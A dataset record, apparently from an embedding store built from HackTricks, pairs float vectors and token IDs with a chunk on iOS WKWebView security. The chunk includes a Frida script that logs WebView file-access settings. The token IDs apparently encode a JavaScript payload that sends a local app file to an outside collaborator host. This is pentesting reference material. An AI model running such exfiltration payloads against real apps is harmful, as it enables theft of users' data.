-0.7804272770881653, 0.22049930691719055, -1.0065704584121704, 0.6828250885009766, 0.29183703660964966, 0.3570201098918915, -0.05140279605984688, -0.9642559885978699, -0.640752911567688, -0.6691336035728455, 0.2211897075176239, 0.39064523577690125, 0.5497016906738281, -0.03553321212530136, -0.9202473759651184, -0.2422868013381958, 0.3039300739765167, -0.3482569754123688, -0.27750563621520996, -0.3568423092365265, 0.01895599253475666, 0.11439678072929382, 0.5137816071510315, -0.8337461948394775, -0.07928182184696198, 0.22365505993366241, -0.7680976986885071, 0.9636131525039673, -1.0730758905410767, -0.2449197620153427, 0.3715336322784424, 0.019691942259669304, -0.178517147898674, 0.7540931701660156, -0.5486105680465698, -0.21521462500095367, -0.02024562656879425, 0.010484308935701847, -0.27174511551856995, -0.3244892954826355, 0.8494189977645874, -0.08309964090585709, 0.3867694139480591, 0.350291907787323, 0.26166650652885437, -0.09507700800895691, 0.08138550072908401, 0.07932956516742706, -0.6267061829566956, 0.21357008814811707, -0.46115973591804504, 0.4513188600540161, 0.31729209423065186, -0.18183204531669617, -0.00628334516659379, -0.2844045162200928, 0.23377792537212372, -0.491630494594574, 0.1307925134897232, -0.8351245522499084, -0.5870015025138855, 0.24566154181957245, 0.4716864228248596, -0.12972474098205566, 0.25464746356010437, 0.2305903285741806, -0.09619443118572235, -0.1635579615831375, -0.10756383836269379, -1.0536309480667114, -0.9123636484146118, -0.2719216048717499, -0.33684590458869934, 0.21974773705005646, -0.2799403667449951, 1.04546320438385, -0.5903090834617615, -0.1830497533082962, 0.41487917304039, 0.01881340518593788, -0.07833996415138245, -1.159602403640747, -0.39697104692459106, -0.49569272994995117, 0.07546401768922806, 0.3592188060283661, 0.1338196098804474, -0.20134124159812927, 0.5220133662223816, -0.7857304811477661, 0.6434529423713684, 0.15323705971240997, -0.13916537165641785, -0.11107181012630463, 0.9092557430267334, 0.21603237092494965, -0.491653710603714, 0.18259716033935547, 0.30864450335502625, 0.007869802415370941, 0.3514798879623413, -0.05573561415076256, -0.3265071213245392, -0.6606048345565796, -1.261171579360962, 0.06413950771093369, -0.35863059759140015, -0.07304365932941437, -0.2174023985862732, -0.15160110592842102, -0.4438883066177368, 0.7826473712921143, -0.31798142194747925, -0.551741361618042, -0.0524083711206913, -0.00007352500688284636, 0.07226481288671494, -0.6014665961265564, 0.027875440195202827, -0.5451840162277222, -0.14077706634998322, 0.43848028779029846, 0.39925462007522583, 0.10185323655605316, -0.23780176043510437, 0.12169141322374344, -0.254411518573761, 0.6891433000564575, -0.39876410365104675, -0.5774990320205688, -0.6772903203964233, 0.03890369087457657, -0.1751163899898529, -0.7321711182594299, -0.011261212639510632, -0.7336318492889404, 0.6587160229682922, -0.40053513646125793, -0.0545988604426384, 0.34012261033058167, -0.31207308173179626, -0.0986701250076294, 0.07377255707979202, 0.5819905400276184, -0.46633124351501465, 0.10239414870738983, 0.34568101167678833, 0.7691331505775452, 0.42901089787483215, 0.05147184804081917, -0.5013242959976196, 0.30365192890167236, -0.8838459849357605, -0.8197621703147888, 0.14466659724712372, -0.28101596236228943, -0.2568020522594452, -0.3573465645313263, -0.4189164936542511, 0.38376685976982117, 0.07632404565811157, -0.05801317095756531, 1.00947105884552, -0.16684691607952118, 0.2807578444480896, -1.0923606157302856, 0.11997511982917786, -0.0031600964721292257, -0.1670629382133484, 0.09573772549629211, -0.5822658538818359, 0.042680054903030396, -0.19088967144489288, -0.49852612614631653, -0.20613239705562592, -0.8799641728401184, 0.11200746893882751, 0.5953003168106079, -0.1793452799320221, 0.8150200247764587, -0.6832408308982849, -0.7240977883338928, -0.09931698441505432, 0.12886297702789307, 0.25412821769714355, -0.09931836277246475, 0.8060309886932373, 0.22133779525756836, 0.5272972583770752, 0.03828570619225502, 0.11207083612680435, 0.006321924272924662, -0.29950568079948425, 0.403349369764328, 0.05698621645569801, -0.6429822444915771, 1.0909459590911865, 0.18181313574314117, -0.8935152292251587, -0.6138971447944641, -0.2670727074146271, -0.05465087294578552, -0.3393104076385498, -0.05833808332681656, -0.15041565895080566, 0.34297460317611694, 0.08558738976716995, -0.1708211600780487, 0.6479697823524475, 0.4821378290653229, 0.05451154708862305, -0.33406513929367065, -0.0026673167012631893, -0.06445993483066559, 0.17068350315093994, 0.7625848650932312, -0.53041011095047, -0.37991827726364136, -0.4634494483470917, -0.6367184519767761, 0.49482131004333496, 0.25995537638664246, 1.3660930395126343, -0.10306418687105179, 0.6765987277030945, -0.10444549471139908, -0.04874935373663902, 1.010411262512207, 0.01858161948621273, -0.24681861698627472, 0.9382927417755127, 0.3617480397224426, -0.7050004601478577, -0.41455498337745667, 0.5751630663871765, 0.21087472140789032, 0.09782925993204117, -0.22211293876171112, 0.3301486372947693, 0.41353023052215576, 0.09076837450265884, -0.1561293601989746, -0.15914271771907806, -0.628865659236908, -0.9178156852722168, 0.08454333245754242, 0.17211021482944489, -0.039105374366045, -0.3820083439350128, -0.16875804960727692, 0.1309148371219635, -0.2942265272140503, -0.12198908627033234, 0.23572476208209991, 0.3136204779148102, 0.3081112504005432, -0.610256552696228, -0.186195969581604, -0.898703396320343, -0.8175207376480103, -0.3973163664340973, -0.8373944759368896, -0.3421482443809509, -0.6796358227729797, -0.003985367249697447, -0.08876849710941315, -0.9755260944366455, 0.46093928813934326, -0.5827842354774475, 0.2981460392475128, -0.4439312815666199, -0.9769442081451416, -0.023539355024695396, 0.8738720417022705, -0.23749330639839172, 0.08841340988874435, 0.35382527112960815, 0.37194857001304626, 0.0570949912071228, -0.46632808446884155, -0.12589524686336517, 0.35875213146209717, -0.020765889436006546, 0.6958810091018677, 0.3234676122665405, -0.3881492018699646, -0.03400455415248871, 0.4036865830421448, -0.7515527009963989, 0.03802332282066345, -0.12783250212669373, 0.1758214384317398, 0.3817571997642517, 0.3473837971687317, 0.4876191020011902, 0.5662505030632019, 0.0792088434100151, 0.6074072122573853, -0.5614895224571228, 0.3768497705459595, 0.9602329730987549, -0.2274674028158188, -0.15045087039470673, 0.023146208375692368, 0.44040822982788086, -0.10091832280158997, 0.3072845935821533, 0.1799638420343399, -0.1132025271654129, 0.19014637172222137, -0.413054883480072, 0.05593780800700188, -0.5140595436096191, -0.5180209279060364, 0.48990681767463684, 0.2335139662027359, 0.5659493207931519, 0.4416104555130005, 0.2970965802669525, 0.1256716251373291, -0.7757245898246765, 0.508642852306366, -0.7675229907035828, -0.2631068229675293, 0.5597662925720215, -0.223351389169693, -0.13610054552555084, -0.7554831504821777, -0.3952118158340454, -0.4134804904460907, 0.45762696862220764, -0.14315812289714813, 0.408391535282135, 0.17005476355552673, 0.11046181619167328, 1.434707760810852, -0.42083480954170227, -0.09450691938400269, -0.33254683017730713, 0.4622184634208679, -0.8123062252998352, -1.2058788537979126, 0.11291825771331787, 0.7206602692604065, 0.3464318513870239, -0.539135754108429, -0.5457644462585449, -0.043100856244564056, 0.5777773857116699, -0.00977586954832077, 0.35608386993408203, 0.07239582389593124, -0.522161602973938, 0.5947863459587097, -0.6676180958747864, -0.014868070371448994, -0.024335118010640144, 0.14488060772418976, 0.477804034948349, -0.43440812826156616, -0.294769823551178, 0.07650689780712128, 0.4735841751098633, 0.22733810544013977, 0.6600533723831177, 0.47813940048217773, 0.33734893798828125, -0.592091977596283, 0.008826645091176033, -0.5479742288589478, 0.437797486782074, 0.35540229082107544, -0.10530314594507217, 0.17062360048294067, 0.6338019967079163, 0.7348061203956604, -0.9078090190887451, -0.17849068343639374, 0.6554011702537537, 0.25883710384368896, -0.3419250547885895, 0.21459124982357025, -0.13695695996284485, 0.31517156958580017, 0.07584846019744873, -0.46178096532821655, 0.09672340750694275, -0.012191901914775372, -0.35482510924339294, -0.18384988605976105, -0.35684701800346375, 1.0441854000091553, -0.44584304094314575, 0.6099466681480408, -0.47831371426582336, -0.1103147640824318, 0.5448930859565735, 0.5878771543502808, -0.6186872720718384, 0.7512956261634827, 0.6601841449737549, 0.05062955990433693, -0.42538705468177795, 0.4930711090564728, -0.40295255184173584, 0.25922781229019165, 0.08583009243011475, 0.11403658986091614, -0.3053087592124939, 0.5204886794090271, 0.13872234523296356, -0.6657699346542358, -0.7299647927284241, 0.1217079758644104, 0.32108980417251587, 0.23799000680446625, 0.604849100112915, -0.24138745665550232, -0.08982444554567337, -0.5367509722709656, 0.48746874928474426, -0.6476263999938965, -0.118555948138237, 0.07081198692321777, -0.44303491711616516, -0.4949842691421509, 0.7416173219680786, 0.3503626585006714, 0.47748398780822754, -0.227101668715477, 0.5141046643257141, 0.19406545162200928, 0.6572149395942688, -0.20988048613071442, -0.4043426215648651, -0.8045743107795715, 0.021857989951968193, -0.1347033977508545, -0.24756847321987152, 0.12092731893062592, -0.6575244665145874, 0.9856619238853455, 0.07383235543966293, -0.5744215250015259, -0.13318586349487305, 0.026416799053549767, -0.2704712748527527, -0.8438189625740051, 0.6975347399711609, -0.34077155590057373, -0.4739421010017395, -0.11978211253881454, -0.03117193654179573, 0.2283523678779602, 0.19201500713825226, -0.6078894138336182, 0.14180335402488708, -0.4994269013404846, -0.16796177625656128, -0.38782045245170593, 0.44688212871551514, -0.6592764854431152, -0.30373451113700867, 0.26736781001091003, -0.5226442813873291, -0.5981462001800537, -0.04899771511554718, -0.3296043574810028, -0.10869155824184418, 0.6703159213066101, 0.72432541847229, 0.21536967158317566, 0.6889459490776062, -0.3247251510620117, 0.32067540287971497, 0.2864886224269867, 0.5855500102043152, -0.09050852805376053, 0.732880711555481, 0.011004295200109482, -0.24597696959972382, -0.22152528166770935, -0.38838106393814087, 0.6100702285766602, 0.08901731669902802, -0.20179256796836853, -0.6593782305717468, -0.008921736851334572, -0.8028934597969055, -0.3810090720653534, 0.5882760882377625, 0.4883959889411926, -0.20729511976242065, -0.37062689661979675, -0.9475501775741577, 0.6953704357147217, -0.6284468173980713, 0.16476194560527802, 0.2130950391292572, -0.04275646433234215, 0.14954090118408203, -0.026004645973443985, 0.40937164425849915, -1.2552729845046997, 4.455397605895996, 0.5692285895347595, 0.1190088614821434, -0.31305232644081116, 0.2851799428462982, 0.8964301347732544, 1.2214182615280151, -0.581902801990509, 0.3115653693675995, -0.3018852174282074, 0.02855726331472397, 0.02948676608502865, 0.5534403920173645, 0.28053316473960876, 0.23132358491420746, 0.8025200366973877, -0.192119762301445, 0.06017426773905754, 0.20496556162834167, -1.2963835000991821, -0.8708145022392273, -0.2048460990190506, -0.6574629545211792, 1.1233582496643066, 0.5335718989372253, 0.32189345359802246, 0.24221830070018768, -1.190663456916809, -0.7907993793487549, -0.4483191668987274, -0.2151716947555542, -0.22778984904289246, 0.5671798586845398, -0.09366454184055328, -0.6352776885032654, 0.037373609840869904, -0.1268472969532013, -1.3199965953826904, -0.32344454526901245, 0.1527673900127411, 0.21782737970352173, -0.34183329343795776, 0.32699254155158997, -0.2453167885541916, 0.27257171273231506, 0.7770329117774963, -0.6744977831840515, 0.03463251516222954, 0.5575317740440369, -0.6522879600524902, 0.7815619707107544, -0.48010483384132385, 0.7866466045379639, -0.6483467221260071, -0.08195168524980545, 0.29580068588256836, 0.07149410247802734, -0.11047325283288956, 0.19305729866027832, -0.1146792620420456, 0.7071932554244995, -0.6942716240882874, -0.05982820317149162, -0.12138108164072037, -0.9098176956176758, 0.6957775950431824, -0.18336570262908936, 0.8300458192825317, -0.4419710040092468, -0.41139426827430725, -0.42465850710868835, 0.1092761978507042, -0.23057037591934204, 0.08200553804636002, 0.78061842918396, -0.001046778168529272, -0.3271563649177551, -0.0032336909789592028, 0.7680218815803528, -0.6950944662094116, -0.4401147663593292, -0.760517418384552, -0.5145299434661865, 0.16106051206588745, 0.7963035702705383, 0.06755001097917557, -0.41970908641815186, -0.8455740809440613, -0.01903417520225048, 0.6847015619277954, 0.7063986659049988, 0.09509722888469696, -0.7439220547676086, -0.33808043599128723, 0.18542300164699554 ]
[ 2467, 9124, 1012, 2065, 2017, 12850, 1996, 4621, 4761, 2013, 1037, 21318, 8545, 2497, 8584, 2073, 2918, 3126, 2140, 2003, 2036, 2275, 2000, 9152, 2140, 2017, 2097, 2156, 2008, 2009, 2003, 2025, 2275, 2000, 1000, 19701, 1000, 1010, 2612, 2017, 1005, 2222, 6855, 2242, 2714, 2000, 1996, 2206, 1024, 6207, 8545, 2497, 2850, 2696, 1024, 1013, 1013, 5187, 2575, 10790, 16048, 2278, 1011, 1042, 2549, 2050, 2692, 1011, 19540, 2629, 1011, 6282, 2575, 2497, 1011, 3515, 23632, 2487, 11329, 2487, 2094, 2581, 17914, 1012, 2023, 4761, 1000, 6207, 8545, 2497, 2850, 2696, 1024, 1013, 1013, 1000, 2003, 2714, 2000, 1996, 1000, 5371, 1024, 1013, 1013, 1000, 4761, 2004, 2009, 2515, 2025, 10408, 2168, 1011, 4761, 3343, 1998, 3499, 3229, 2000, 2334, 6764, 1998, 2151, 4773, 4219, 1012, 4654, 8873, 7096, 11657, 1035, 6764, 18886, 3070, 1012, 8773, 1012, 2002, 2595, 2368, 16044, 1027, 3853, 1006, 1007, 1063, 13075, 2002, 2595, 1010, 1045, 1025, 13075, 2765, 1027, 1000, 1000, 1025, 2005, 1006, 1045, 1027, 1014, 1025, 1045, 1026, 2023, 1012, 3091, 1025, 1045, 1009, 1009, 1007, 1063, 2002, 2595, 1027, 2023, 1012, 25869, 16044, 4017, 1006, 1045, 1007, 1012, 2000, 3367, 4892, 1006, 2385, 1007, 1025, 2765, 1009, 1027, 1006, 1000, 2199, 1000, 1009, 2002, 2595, 1007, 1012, 14704, 1006, 1011, 1018, 1007, 1025, 1065, 2709, 2765, 1065, 13075, 1060, 8093, 1027, 2047, 20950, 11039, 25856, 2890, 15500, 1006, 1007, 1025, 1060, 8093, 1012, 2006, 16416, 5149, 9153, 15007, 22043, 1027, 3853, 1006, 1007, 1063, 2065, 1006, 1060, 8093, 1012, 3201, 9153, 2618, 1027, 1027, 20950, 11039, 25856, 2890, 15500, 1012, 2589, 1007, 1063, 13075, 1060, 8093, 2475, 1027, 2047, 20950, 11039, 25856, 2890, 15500, 1006, 1007, 1025, 1060, 8093, 2475, 1012, 2330, 1006, 1005, 2131, 1005, 1010, 1005, 8299, 1024, 1013, 1013, 19446, 2063, 2475, 2290, 2094, 2692, 2480, 2595, 4609, 2480, 14905, 2629, 2615, 8261, 17112, 2549, 3501, 2487, 2050, 19841, 2615, 2361, 1012, 20934, 14536, 26895, 7875, 6525, 4263, 1012, 5658, 1013, 1005, 1009, 1060, 8093, 1012, 3433, 18209, 1012, 2002, 2595, 2368, 16044, 1006, 1007, 1010, 2995, 1007, 1025, 1060, 8093, 2475, 1012, 4604, 1006, 19701, 1007, 1025, 1065, 1065, 1060, 8093, 1012, 2330, 1006, 1005, 2131, 1005, 1010, 1005, 5371, 1024, 1013, 1013, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 3968, 2549, 2063, 2692, 4215, 2620, 1011, 1042, 2581, 2546, 2581, 1011, 28941, 2620, 1011, 6109, 9468, 1011, 1039, 19481, 2692, 21472, 12376, 18139, 2050, 2629, 1013, 3075, 1013, 18394, 1013, 4012, 1012, 27280, 7011, 4014, 5397, 1012, 2073, 6491, 2100, 12618, 9333, 2121, 1012, 20228, 2923, 1005, 1010, 2995, 1007, 1025, 1060, 8093, 1012, 4604, 1006, 19701, 1007, 1025, 1059, 2243, 8545, 2497, 8584, 1024, 3499, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 1059, 2243, 28139, 25523, 2015, 1010, 6270, 2011, 12398, 1007, 1024, 2009, 12939, 9262, 22483, 2770, 1999, 1996, 6123, 1997, 1037, 5371, 1024, 1013, 1013, 5679, 24471, 2140, 2000, 3229, 4180, 2013, 2060, 5371, 1024, 1013, 1013, 5679, 24471, 4877, 1012, 3499, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 1059, 2243 ]
hack_tricks
435.txt
5
##webviewconfiguration, false by default ) : it enables javascript running in the context of a file : / / scheme url to access content from any origin. you can search for those functions in the source code of the application or in the compiled binary. also, you can use the following frida script to find this information : objc. choose ( objc. classes ['wkwebview'], { onmatch : function ( wk ) { console. log ('onmatch : ', wk ) ; console. log ('url : ', wk. url ( ). tostring ( ) ) ; console. log ('javascriptenabled : ', wk. configuration ( ). preferences ( ). javascriptenabled ( ) ) ; console. log ('allowfileaccessfromfileurls : ', wk. configuration ( ). preferences ( ). valueforkey _ ('allowfileaccessfromfileurls'). tostring ( ) ) ; console. log ('hasonlysecurecontent : ', wk. hasonlysecurecontent ( ). tostring ( ) ) ; console. log ('allowuniversalaccessfromfileurls : ', wk. configuration ( ). valueforkey _ ('allowuniversalaccessfromfileurls'). tostring ( ) ) ; }, oncomplete : function ( ) { console. log ('done for wkwebview!') ; } } ) ; frida - u - f com. authenticationfailure. wheresmybrowser - l webviews _ inspector. jsonmatch : < wkwebview : 0x1508b1200 ; frame = ( 0 0 ; 320 393 ) ; layer = < calayer : 0x1c4238f20 > > url : file : / / / var / mobile / containers / data / application / a654d169 - 1db7 - 429c - 9db9 - a871389a8baa / library / wkwebview / scenario1. htmljavascriptenabled : trueallowfileaccessfromfileurls : 0has
[ 0.07701268047094345, -0.09097319096326828, -0.44684845209121704, 0.22608545422554016, -0.33242544531822205, 0.1881961077451706, -0.5188279151916504, 0.04289973899722099, 0.3271932601928711, 0.3988068699836731, 0.09075243771076202, -0.06864572316408157, 0.06484014540910721, -0.4597121477127075, -0.40346306562423706, -0.11501239240169525, -0.8886154890060425, -0.4906134009361267, -0.7447198033332825, -0.112458735704422, 0.06445294618606567, 0.25441768765449524, -0.9747908115386963, -1.0462677478790283, -0.7338261008262634, 0.6903571486473083, 0.892309844493866, -0.5322131514549255, 1.2739036083221436, 0.6479748487472534, 0.47847479581832886, -0.37868985533714294, -0.049498479813337326, -0.4212968051433563, 0.18571536242961884, -0.06397952139377594, 1.092276692390442, -0.2872310280799866, 0.05136968195438385, -0.5577067136764526, 0.13068735599517822, -0.8686646223068237, 0.09901101887226105, -0.1810716986656189, -0.6709777116775513, -0.603893518447876, 0.4900568127632141, -0.4952487051486969, -0.0920151099562645, -0.35059550404548645, 0.442857563495636, -0.06645911186933517, -0.2215367704629898, -0.10228241980075836, -0.07873956859111786, -0.033026568591594696, 0.016851484775543213, 0.18989543616771698, -0.458524614572525, 0.675176739692688, 0.21440489590168, 0.5692821145057678, 0.1960490494966507, -0.8280686736106873, -0.05088016763329506, 0.15695182979106903, 0.33726605772972107, 0.1549922525882721, -0.19051454961299896, -0.16698884963989258, 0.16015994548797607, 0.5134822726249695, -0.47340816259384155, -0.15153343975543976, -0.5649412274360657, -0.3586256206035614, -0.24469952285289764, 0.0077497344464063644, -0.09607374668121338, 0.7662632465362549, -0.305642694234848, 0.10572641342878342, 0.46185559034347534, 0.22038625180721283, -0.9067672491073608, -0.11145824939012527, 0.43169689178466797, 0.841924786567688, -0.8544707298278809, 0.3095853924751282, 0.0646904706954956, 0.38352277874946594, -0.8074188232421875, 0.13353213667869568, 0.5157474875450134, 1.003430962562561, -0.3650195896625519, -0.18598051369190216, 0.22500905394554138, -0.1943904608488083, 0.5679060816764832, 1.0219260454177856, -0.38880831003189087, 0.6991937756538391, -0.5294355750083923, 0.003217429155483842, -0.02339022047817707, -0.7191367149353027, -0.4818512499332428, -0.42775169014930725, 0.08632350713014603, 0.08250509947538376, 0.49987098574638367, -0.14939893782138824, 0.25925174355506897, 0.6914147138595581, 0.19706062972545624, -0.13577942550182343, -0.5231260061264038, -0.04657483845949173, 0.04530177637934685, -0.17744643986225128, 0.40839990973472595, -0.22529228031635284, 0.9362375140190125, 0.6294291019439697, -0.3165084719657898, 1.0840251445770264, -0.28919336199760437, -0.3111742436885834, -0.06523104012012482, -0.07851430773735046, -0.13931426405906677, 0.5889221429824829, -0.6903358101844788, 0.1532040387392044, -0.04525760933756828, 0.13347892463207245, 0.18542306125164032, -1.0993560552597046, 0.39792391657829285, 1.0751441717147827, -0.17331631481647491, 1.3949564695358276, 0.4898584485054016, -0.13970789313316345, -0.3927079141139984, -0.38201987743377686, -0.5348532795906067, 0.9165006279945374, -0.28716206550598145, -0.08692652732133865, 0.5952293276786804, -0.058873653411865234, -0.5953270196914673, -0.015064027160406113, -0.4839516878128052, 0.0703071728348732, 0.1619465947151184, -0.20752091705799103, -0.11368340253829956, 0.1579461246728897, -0.47124287486076355, 0.2877526879310608, -0.3693060874938965, 0.05694321542978287, -0.6846494674682617, -0.14758658409118652, -0.03025767393410206, -0.016628574579954147, 0.14437124133110046, 0.29343074560165405, -0.3843342959880829, -0.11494235694408417, 1.110416054725647, 0.5360201597213745, 0.038131047040224075, -1.1436116695404053, 0.24119968712329865, 0.234632670879364, -0.6544055938720703, 0.7630619406700134, -0.3089497983455658, 0.8521014451980591, -0.309598833322525, -0.24819500744342804, -0.33402127027511597, -0.6298755407333374, -0.30368590354919434, -0.11388670653104782, 0.04559335112571716, 0.9246240854263306, -0.6847500801086426, 0.274301141500473, 0.7766546607017517, 0.07846368849277496, -0.9173839688301086, -0.41877228021621704, 0.17163141071796417, -1.4774231910705566, -0.24614880979061127, 0.3424501419067383, -0.06939411163330078, 0.39565959572792053, -0.4218602180480957, -0.27994248270988464, 0.599537193775177, 0.7967724204063416, -0.3253732919692993, 0.886184573173523, 0.4252314269542694, -0.24855805933475494, -0.17565125226974487, 0.12000580877065659, -0.027069129049777985, -0.18439073860645294, -0.2598932385444641, 0.6521962285041809, 0.08453670889139175, 0.43844595551490784, 0.30825677514076233, 0.4709131419658661, 0.7332203388214111, 1.379709005355835, -0.024752994999289513, 0.17489787936210632, 0.5047974586486816, 0.1558426320552826, -0.5469323992729187, 0.26688623428344727, 0.43433159589767456, 0.41427603363990784, 0.5006744265556335, 0.970975935459137, -0.049646537750959396, -0.11236830055713654, 0.07850559055805206, 0.2811564803123474, -0.45696118474006653, 0.23659084737300873, -0.10954779386520386, 0.917842447757721, 1.0389091968536377, 1.0268160104751587, 0.07016240805387497, 0.6592746376991272, -0.11388332396745682, 0.20499178767204285, 0.4614870250225067, 0.5414694547653198, -0.16823917627334595, 0.6489731073379517, 0.7434705495834351, -0.4695398211479187, -0.23651233315467834, 0.04519236087799072, 0.360012412071228, 0.9810330271720886, -0.3358955681324005, -0.7590112686157227, -0.37431207299232483, 0.4430227279663086, -0.5415417551994324, -0.10794508457183838, -0.13366001844406128, 0.28172361850738525, 0.2371821254491806, 0.5155779719352722, 0.19494040310382843, -1.2160425186157227, -0.7796791195869446, -0.5413171648979187, -1.208785891532898, -0.38983142375946045, -1.1287652254104614, 0.22468098998069763, 0.4662206768989563, -0.8478304743766785, 0.6459932923316956, 0.10497137904167175, -0.36683449149131775, -0.09579350054264069, -0.20896275341510773, 1.0116816759109497, 0.19996939599514008, -0.000059612000768538564, -0.39947476983070374, 0.11008934676647186, 0.28970274329185486, 0.23723235726356506, -0.4697716236114502, -0.30749741196632385, -0.3130970895290375, -0.08908724039793015, 0.21094954013824463, -0.23105964064598083, 0.10582994669675827, 0.31051498651504517, -0.44320178031921387, -0.3882736265659332, 0.2649056315422058, 0.20684076845645905, 0.1597912311553955, 0.0858149603009224, -0.706133246421814, 0.6218801736831665, -0.0762282982468605, -0.2282179445028305, 0.5329688787460327, 0.5477373600006104, -0.941910982131958, 0.5706933736801147, 0.15727153420448303, 0.27357882261276245, -0.6561314463615417, 0.6724169850349426, 0.2545592784881592, 0.2018095999956131, -0.12300164997577667, -0.23330041766166687, 0.07407768815755844, -0.5034462213516235, -0.33794552087783813, -0.1932200789451599, -0.35520824790000916, 0.4274774193763733, -0.3280845582485199, -1.2797983884811401, 0.41521376371383667, -0.07811982929706573, -0.27727827429771423, -0.576508641242981, -0.021350136026740074, 0.44979092478752136, 0.2986396253108978, 0.01380942389369011, 0.045716624706983566, -0.09364491701126099, 0.26055920124053955, 0.015054156072437763, 0.576901912689209, -0.067011758685112, 0.27245357632637024, 0.12886598706245422, -0.08861517906188965, 0.237213596701622, 0.43693456053733826, -0.38968372344970703, -0.09190613031387329, 0.01042974554002285, -0.8632944822311401, -0.3149980306625366, 0.6655872464179993, 0.18076935410499573, -0.5275519490242004, 0.33372175693511963, -0.38026368618011475, -0.16854065656661987, -0.0857429951429367, 0.4286327660083771, 0.38488098978996277, 0.30893269181251526, 0.3073030412197113, -0.1461305022239685, -0.2936305105686188, -0.6275162100791931, 0.7185108065605164, 0.3333536982536316, 0.6518421769142151, -0.10129489004611969, 0.4683942198753357, -0.345851868391037, -0.7778928875923157, -0.05049147829413414, 0.10798241943120956, -0.8499795198440552, 0.42557305097579956, 0.49190428853034973, 0.6330201625823975, 0.1339101791381836, 0.32310372591018677, -0.5292365550994873, -0.011914602480828762, 1.1901061534881592, 0.21676428616046906, 0.17233888804912567, -0.06931906938552856, -0.08518516272306442, 0.2064380645751953, -0.47545570135116577, 0.22347067296504974, 0.303598016500473, 0.50749272108078, -0.35312792658805847, -0.8177026510238647, -0.433518648147583, 0.16734226047992706, 0.5433292984962463, 0.0375114269554615, 0.3639788031578064, 0.33610737323760986, 0.5278423428535461, -0.1609283685684204, 0.47943606972694397, -0.4482688009738922, 0.7013372182846069, -0.17808081209659576, 0.9015108346939087, -0.30341053009033203, 0.07371090352535248, -0.4397628903388977, -0.3359164595603943, -0.0350758321583271, -0.15841816365718842, 0.6040638089179993, -0.03331665322184563, -1.0155760049819946, -0.13190151751041412, 0.23019027709960938, 0.6684538722038269, -0.43073421716690063, -0.007171953562647104, 0.2900162935256958, 0.4373103082180023, 0.43389296531677246, -0.41999563574790955, -0.4540749490261078, -0.8925278186798096, 0.4866413474082947, 0.05051584169268608, 0.1361074596643448, -0.3266056478023529, -0.6933184266090393, -0.09870988875627518, -0.6603384613990784, 0.4068034887313843, 0.20094189047813416, 0.2520942687988281, 0.23284529149532318, -0.9272989630699158, -0.32048624753952026, 0.5779531002044678, -0.022746607661247253, -0.26879289746284485, -0.32482215762138367, 0.48213717341423035, 0.42191165685653687, 0.6612093448638916, -0.39010539650917053, -0.4626341164112091, 0.5847311615943909, -0.7579635381698608, 0.6145459413528442, -0.5706175565719604, 0.1418369710445404, -0.5361770391464233, -0.20335593819618225, -0.004947094712406397, 0.6095291376113892, -0.2940642237663269, -0.21310792863368988, -0.10683953016996384, -0.24850130081176758, -0.41596081852912903, -0.416411817073822, 0.6307347416877747, -0.10515447705984116, -0.23123911023139954, 0.09526544064283371, 0.7149426937103271, 0.047788310796022415, 0.4350544214248657, -0.45674362778663635, -0.8153321146965027, 0.21035203337669373, -0.19932778179645538, -0.15759792923927307, 0.35193780064582825, -0.13556048274040222, -0.013518826104700565, -0.4815393388271332, 0.5537893176078796, -0.012541834264993668, 0.04625244811177254, -0.8110316395759583, -0.46160227060317993, 0.03083804063498974, -0.02127070538699627, 0.009281251579523087, -0.012378737330436707, 0.5049433708190918, 0.2897665202617645, 0.0033838313538581133, 0.01622735895216465, -0.6913192868232727, -1.4172950983047485, -0.09681046009063721, -0.10390830785036087, 0.03158551827073097, -0.11492149531841278, 0.8861253261566162, -0.41552507877349854, -0.5170931220054626, 0.41290029883384705, -0.4807712137699127, 0.541519820690155, -0.6048499941825867, 0.01356037613004446, -0.4418129026889801, -0.18385185301303864, 0.10945890098810196, 0.09901342540979385, -0.1587630808353424, 0.09851302206516266, 0.16434386372566223, 0.5038959980010986, 0.0037829894572496414, -0.43109646439552307, -0.08147628605365753, 0.5407063961029053, -0.3975895941257477, -0.35981565713882446, -0.5294916033744812, 1.0287072658538818, -0.6460457444190979, 0.3636755645275116, -0.23255927860736847, -0.8134906888008118, -1.0581244230270386, -0.7854987382888794, 0.001773988245986402, -0.5628989338874817, 0.16139690577983856, -0.31134581565856934, -0.20650945603847504, -0.35809844732284546, 0.19274672865867615, -0.18289171159267426, -0.6396732926368713, 0.03143743798136711, -0.06469317525625229, 0.1806245744228363, -0.47092506289482117, -0.3458300232887268, 0.0337921604514122, -0.35770103335380554, 0.05883791297674179, 0.46672114729881287, 0.5653752684593201, 0.11016681045293808, -0.008083025924861431, 0.3531332015991211, 0.5164350271224976, -0.12512776255607605, -0.5039812326431274, -0.32486918568611145, -0.20905828475952148, -0.32934436202049255, 0.2367068976163864, 0.38115301728248596, -0.5424331426620483, 0.45389753580093384, -0.25347447395324707, 0.3447521924972534, 0.30954620242118835, -0.790595293045044, 0.30368003249168396, -0.3749619424343109, 0.4895201623439789, -0.4222668409347534, -0.31282857060432434, -0.6601018309593201, 0.4063829481601715, 0.6307612657546997, -0.031235985457897186, -0.7183764576911926, 0.33668211102485657, -0.9907494187355042, -1.476826786994934, 0.1825770139694214, -0.16309146583080292, -0.2196410894393921, -0.38903912901878357, 0.19790367782115936, 1.056510090827942, 0.10620522499084473, 0.31625938415527344, 0.4109257757663727, -0.029985155910253525, 0.36802878975868225, -0.21371464431285858, -0.004055533558130264, -0.14839304983615875, -0.19178828597068787, 0.24805739521980286, -0.7274085879325867, -0.07707873731851578, 0.2779726982116699, -0.2508705258369446, -0.15530380606651306, -0.7942732572555542, 0.19440284371376038, 0.8075323104858398, -0.7998396754264832, 0.44482657313346863, 0.14826898276805878, -1.0179462432861328, -0.6299219131469727, 0.12123366445302963, -0.07506813108921051, -0.5527759194374084, 0.650233805179596, 0.7205191254615784, 0.43041765689849854, 0.3497135639190674, 0.04927130788564682, -0.4249175786972046, -0.130318745970726, 0.5075485110282898, -0.3295765519142151, -0.5464199781417847, 0.7025851607322693, -0.07007520645856857, -1.2282160520553589, -0.3718086779117584, 0.16889023780822754, -0.36321431398391724, -0.031880926340818405, -0.2547829747200012, -0.24012775719165802, 0.6387377381324768, -0.04561850056052208, 0.28226152062416077, 0.5286312103271484, -0.08709936589002609, 0.5408858060836792, -0.37375783920288086, 0.658319890499115, 